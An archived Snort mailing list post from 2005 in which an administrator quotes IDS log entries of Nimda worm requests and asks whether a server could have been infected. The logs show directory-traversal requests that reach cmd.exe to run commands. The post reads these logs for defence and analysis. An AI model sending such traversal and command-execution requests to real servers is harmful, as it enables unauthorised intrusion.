Snort mailing list archives
Nimda Question
From: patrick.patenaude () bell ca
Date: Tue, 25 Jan 2005 11:41:16 -0500
I am a little confused over a couple of log results I have picked up. One has a connection closed and the other not. I know this is NIMDA, can someone confirm that even if the connection got closed that it is possible that the server got infected. I do not have access to the server so I can not look into it right now.. Here are the logs: This is one server several attempts; GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dr r HTTP/1.0..Host: www..Connnection: close.... GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe ?/c+dir 32/cmd.exe?/c+dir HTTP/1.0..Host: www..Connnection: close.... GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0..Host: www..Connnection: close.... Here is the other server GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..
Current thread:
- Nimda Question patrick . patenaude (Jan 25)